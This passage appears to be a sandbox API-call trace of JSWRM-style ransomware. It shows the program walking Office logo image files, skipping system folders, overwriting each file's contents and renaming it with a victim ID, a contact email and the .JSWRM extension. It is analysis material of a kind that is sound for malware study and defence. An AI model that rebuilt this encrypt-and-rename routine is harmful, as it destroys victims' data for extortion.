office\\root\\office16\\logoimages\\onenotelogosmall.scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.470] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a723def, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a723def, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a723def, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x64e, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="OneNoteLogoSmall.scale-80.png", cAlternateFileName="ON8B9B~1.PNG")) returned 1 [0133.470] lstrcmpiW (lpString1="OneNoteLogoSmall.scale-80.png", lpString2=".") returned 1 [0133.470] lstrcmpiW (lpString1="OneNoteLogoSmall.scale-80.png", lpString2="..") returned 1 [0133.470] lstrcmpiW (lpString1="OneNoteLogoSmall.scale-80.png", lpString2="...") returned 1 [0133.470] lstrcmpiW (lpString1="OneNoteLogoSmall.scale-80.png", lpString2="windows") returned -1 [0133.470] lstrcmpiW (lpString1="OneNoteLogoSmall.scale-80.png", lpString2="recovery") returned -1 [0133.470] lstrcmpiW (lpString1="OneNoteLogoSmall.scale-80.png", lpString2="perflogs") returned -1 [0133.470] lstrcmpiW (lpString1="OneNoteLogoSmall.scale-80.png", lpString2="documents and settings") returned 1 [0133.470] lstrcmpiW (lpString1="OneNoteLogoSmall.scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0133.470] lstrcmpiW (lpString1="OneNoteLogoSmall.scale-80.png", lpString2="system volume information") returned -1 [0133.470] lstrcmpiW (lpString1="OneNoteLogoSmall.scale-80.png", lpString2="msocache") returned 1 [0133.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogoSmall.scale-80.png", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0133.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogoSmall.scale-80.png", cchWideChar=29, lpMultiByteStr=0x240f48, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteLogoSmall.scale-80.png", lpUsedDefaultChar=0x0) returned 29 [0133.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogoSmall.scale-80.png", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0133.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogoSmall.scale-80.png", cchWideChar=29, lpMultiByteStr=0x241268, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteLogoSmall.scale-80.png", lpUsedDefaultChar=0x0) returned 29 [0133.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.471] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogoSmall.scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogosmall.scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.472] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1614) returned 1 [0133.472] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.472] ReadFile (in: hFile=0x238, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x640, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x640, lpOverlapped=0x0) returned 1 [0133.473] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.473] WriteFile (in: hFile=0x238, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x640, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x640, lpOverlapped=0x0) returned 1 [0133.474] CloseHandle (hObject=0x238) returned 1 [0133.474] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogoSmall.scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogosmall.scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogoSmall.scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogosmall.scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.475] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a723def, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a723def, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a723def, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9cc, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="OutlookLogo.contrast-black_scale-100.png", cAlternateFileName="OU5D17~1.PNG")) returned 1 [0133.475] lstrcmpiW (lpString1="OutlookLogo.contrast-black_scale-100.png", lpString2=".") returned 1 [0133.475] lstrcmpiW (lpString1="OutlookLogo.contrast-black_scale-100.png", lpString2="..") returned 1 [0133.475] lstrcmpiW (lpString1="OutlookLogo.contrast-black_scale-100.png", lpString2="...") returned 1 [0133.475] lstrcmpiW (lpString1="OutlookLogo.contrast-black_scale-100.png", lpString2="windows") returned -1 [0133.475] lstrcmpiW (lpString1="OutlookLogo.contrast-black_scale-100.png", lpString2="recovery") returned -1 [0133.475] lstrcmpiW (lpString1="OutlookLogo.contrast-black_scale-100.png", lpString2="perflogs") returned -1 [0133.475] lstrcmpiW (lpString1="OutlookLogo.contrast-black_scale-100.png", lpString2="documents and settings") returned 1 [0133.475] lstrcmpiW (lpString1="OutlookLogo.contrast-black_scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0133.475] lstrcmpiW (lpString1="OutlookLogo.contrast-black_scale-100.png", lpString2="system volume information") returned -1 [0133.475] lstrcmpiW (lpString1="OutlookLogo.contrast-black_scale-100.png", lpString2="msocache") returned 1 [0133.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogo.contrast-black_scale-100.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0133.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogo.contrast-black_scale-100.png", cchWideChar=40, lpMultiByteStr=0x22d0d8, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookLogo.contrast-black_scale-100.png", lpUsedDefaultChar=0x0) returned 40 [0133.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogo.contrast-black_scale-100.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0133.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogo.contrast-black_scale-100.png", cchWideChar=40, lpMultiByteStr=0x22ce70, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookLogo.contrast-black_scale-100.png", lpUsedDefaultChar=0x0) returned 40 [0133.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.475] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogo.contrast-black_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogo.contrast-black_scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.478] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2508) returned 1 [0133.478] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.478] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x9c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x9c0, lpOverlapped=0x0) returned 1 [0133.480] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.480] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x9c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x9c0, lpOverlapped=0x0) returned 1 [0133.480] CloseHandle (hObject=0x238) returned 1 [0133.480] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogo.contrast-black_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogo.contrast-black_scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogo.contrast-black_scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogo.contrast-black_scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.482] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a6fdbb6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a6fdbb6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a723def, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd8b, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="OutlookLogo.contrast-black_scale-140.png", cAlternateFileName="OUTLOO~1.PNG")) returned 1 [0133.482] lstrcmpiW (lpString1="OutlookLogo.contrast-black_scale-140.png", lpString2=".") returned 1 [0133.482] lstrcmpiW (lpString1="OutlookLogo.contrast-black_scale-140.png", lpString2="..") returned 1 [0133.482] lstrcmpiW (lpString1="OutlookLogo.contrast-black_scale-140.png", lpString2="...") returned 1 [0133.482] lstrcmpiW (lpString1="OutlookLogo.contrast-black_scale-140.png", lpString2="windows") returned -1 [0133.482] lstrcmpiW (lpString1="OutlookLogo.contrast-black_scale-140.png", lpString2="recovery") returned -1 [0133.482] lstrcmpiW (lpString1="OutlookLogo.contrast-black_scale-140.png", lpString2="perflogs") returned -1 [0133.482] lstrcmpiW (lpString1="OutlookLogo.contrast-black_scale-140.png", lpString2="documents and settings") returned 1 [0133.482] lstrcmpiW (lpString1="OutlookLogo.contrast-black_scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0133.482] lstrcmpiW (lpString1="OutlookLogo.contrast-black_scale-140.png", lpString2="system volume information") returned -1 [0133.482] lstrcmpiW (lpString1="OutlookLogo.contrast-black_scale-140.png", lpString2="msocache") returned 1 [0133.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogo.contrast-black_scale-140.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0133.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogo.contrast-black_scale-140.png", cchWideChar=40, lpMultiByteStr=0x22cdc8, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookLogo.contrast-black_scale-140.png", lpUsedDefaultChar=0x0) returned 40 [0133.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogo.contrast-black_scale-140.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0133.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogo.contrast-black_scale-140.png", cchWideChar=40, lpMultiByteStr=0x22d0d8, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookLogo.contrast-black_scale-140.png", lpUsedDefaultChar=0x0) returned 40 [0133.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.482] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogo.contrast-black_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogo.contrast-black_scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.483] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3467) returned 1 [0133.483] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.483] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xd80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xd80, lpOverlapped=0x0) returned 1 [0133.485] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.485] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xd80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xd80, lpOverlapped=0x0) returned 1 [0133.485] CloseHandle (hObject=0x238) returned 1 [0133.485] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogo.contrast-black_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogo.contrast-black_scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogo.contrast-black_scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogo.contrast-black_scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.486] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a723def, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a723def, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7702aa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x10e3, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="OutlookLogo.contrast-black_scale-180.png", cAlternateFileName="OU4261~1.PNG")) returned 1 [0133.486] lstrcmpiW (lpString1="OutlookLogo.contrast-black_scale-180.png", lpString2=".") returned 1 [0133.486] lstrcmpiW (lpString1="OutlookLogo.contrast-black_scale-180.png", lpString2="..") returned 1 [0133.486] lstrcmpiW (lpString1="OutlookLogo.contrast-black_scale-180.png", lpString2="...") returned 1 [0133.486] lstrcmpiW (lpString1="OutlookLogo.contrast-black_scale-180.png", lpString2="windows") returned -1 [0133.487] lstrcmpiW (lpString1="OutlookLogo.contrast-black_scale-180.png", lpString2="recovery") returned -1 [0133.487] lstrcmpiW (lpString1="OutlookLogo.contrast-black_scale-180.png", lpString2="perflogs") returned -1 [0133.487] lstrcmpiW (lpString1="OutlookLogo.contrast-black_scale-180.png", lpString2="documents and settings") returned 1 [0133.487] lstrcmpiW (lpString1="OutlookLogo.contrast-black_scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0133.487] lstrcmpiW (lpString1="OutlookLogo.contrast-black_scale-180.png", lpString2="system volume information") returned -1 [0133.487] lstrcmpiW (lpString1="OutlookLogo.contrast-black_scale-180.png", lpString2="msocache") returned 1 [0133.488] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogo.contrast-black_scale-180.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0133.488] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogo.contrast-black_scale-180.png", cchWideChar=40, lpMultiByteStr=0x22d260, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookLogo.contrast-black_scale-180.png", lpUsedDefaultChar=0x0) returned 40 [0133.488] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogo.contrast-black_scale-180.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0133.488] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogo.contrast-black_scale-180.png", cchWideChar=40, lpMultiByteStr=0x22d298, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookLogo.contrast-black_scale-180.png", lpUsedDefaultChar=0x0) returned 40 [0133.488] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.488] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.488] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogo.contrast-black_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogo.contrast-black_scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.489] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4323) returned 1 [0133.489] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.489] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x10e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x10e0, lpOverlapped=0x0) returned 1 [0133.512] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.512] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x10e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x10e0, lpOverlapped=0x0) returned 1 [0133.512] CloseHandle (hObject=0x238) returned 1 [0133.513] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogo.contrast-black_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogo.contrast-black_scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogo.contrast-black_scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogo.contrast-black_scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.515] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a723def, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a723def, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a723def, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8a4, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="OutlookLogo.contrast-black_scale-80.png", cAlternateFileName="OUTLOO~4.PNG")) returned 1 [0133.515] lstrcmpiW (lpString1="OutlookLogo.contrast-black_scale-80.png", lpString2=".") returned 1 [0133.515] lstrcmpiW (lpString1="OutlookLogo.contrast-black_scale-80.png", lpString2="..") returned 1 [0133.515] lstrcmpiW (lpString1="OutlookLogo.contrast-black_scale-80.png", lpString2="...") returned 1 [0133.515] lstrcmpiW (lpString1="OutlookLogo.contrast-black_scale-80.png", lpString2="windows") returned -1 [0133.515] lstrcmpiW (lpString1="OutlookLogo.contrast-black_scale-80.png", lpString2="recovery") returned -1 [0133.515] lstrcmpiW (lpString1="OutlookLogo.contrast-black_scale-80.png", lpString2="perflogs") returned -1 [0133.515] lstrcmpiW (lpString1="OutlookLogo.contrast-black_scale-80.png", lpString2="documents and settings") returned 1 [0133.515] lstrcmpiW (lpString1="OutlookLogo.contrast-black_scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0133.515] lstrcmpiW (lpString1="OutlookLogo.contrast-black_scale-80.png", lpString2="system volume information") returned -1 [0133.515] lstrcmpiW (lpString1="OutlookLogo.contrast-black_scale-80.png", lpString2="msocache") returned 1 [0133.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogo.contrast-black_scale-80.png", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0133.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogo.contrast-black_scale-80.png", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookLogo.contrast-black_scale-80.png", lpUsedDefaultChar=0x0) returned 39 [0133.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogo.contrast-black_scale-80.png", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0133.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookLogo.contrast-black_scale-80.png", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookLogo.contrast-black_scale-80.png", lpUsedDefaultChar=0x0) returned 39 [0133.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.515] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogo.contrast-black_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogo.contrast-black_scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.516] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2212) returned 1 [0133.516] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.516] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x8a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x8a0, lpOverlapped=0x0) returned 1 [0133.518] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.518] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x8a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x8a0, lpOverlapped=0x0) returned 1 [0133.518] CloseHandle (hObject=0x238) returned 1 [0133.519] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogo.contrast-black_scale-80.png" (normalized: "c:\\program files\\microsoft 